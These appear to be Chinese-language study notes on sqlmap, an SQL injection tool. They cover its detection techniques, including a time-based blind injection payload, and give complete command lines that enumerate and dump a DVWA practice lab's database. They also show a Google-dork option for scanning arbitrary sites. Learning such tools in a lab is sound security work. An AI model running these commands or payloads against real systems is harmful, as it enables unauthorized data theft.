SQLMap自动注入
- 开源sql注入漏洞检测、利用工具
- 检测动态页面中get/post参数、cookie、http头
- 数据榨取
- 文件系统访问
- 操作系统命令执行
- 引擎强大、特性丰富
- Xss漏洞检测
五种检测技术
- 基于布尔的盲注检测
- 基于时间的盲注检测
- ‘ and (select * from (select(sleep(20)))a)–
- 基于错误的检测
- 基于UNION联合查询的检测
- 适用于通过for循环直接输出联合查询结果,否则只显示第一项结果。
- 基于堆叠查询的检测
- ;堆叠多个查询语句
- 适用于非select的数据修改、删除操作
其它
- 数据库直连 -d
- 与burpsuite、google结合使用,支持正则表达式限定测试目标。
- Get、post、cookie、referer、User_Agent(随机或指定)
- Cookie过期后自动处理Set-Cookie头,更新cookie信息
- 限速:最大并发,延迟并发
- 支持Basic、Digest、NTLM、CA身份认证
- 数据库版本、用户、权限、hash枚举和字典破解、暴力破解表、列名称
- 文件上传下载、UDF、启动并执行存储过程、操作系统命令执行、访问Windows注册表
- 与w3af、metasploit集成结合使用,基于数据库服务进程提权和上传执行后门。
操作
GET方法测试
- -u ,要测试的链接
sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=mrqrkm9hfcqrdt8gluktgjgv32"
- -f,获得数据库指纹信息
- –users,获得数据库用户数据
- –banner,获得banner信息
- –dbs,目标数据库中有哪些库
sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=mrqrkm9hfcqrdt8gluktgjgv32" --dbs
- -D 数据库 –tables,查看库中有哪些表
sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=mrqrkm9hfcqrdt8gluktgjgv32" -D dvwa --tables
- -D 数据库 -T 表名 –columns
sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=mrqrkm9hfcqrdt8gluktgjgv32" -D dvwa -T users --columns
- -dump
sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=mrqrkm9hfcqrdt8gluktgjgv32" -D dvwa -T users -dump
- –schema,元数据
- -a ,所有的
- -d,直连
sqlmap -d "mysql://user:password@192.168.20.10:3306/dvwa -f --users"
- -m,要测试链接列表文件
- -g,扫描google搜索结果
sqlmap.py -g "inurl:\".php?id=1\""
POST方法
- 使用http请求文件(直接把burpsuite拦截到的请求粘贴到文本文件)
sqlmap -r request.txt --dbs
- 使用burpsuitelog文件(burpsuite的Option->misc->logging)
HTTPS
sqlmap -u "xxxxxxxxxxxxxx" --force-ssl
扫描配置文件
sqlmap -c sqlmap.conf
- 默认的config文件/etc/sqlmap/sqlmap.conf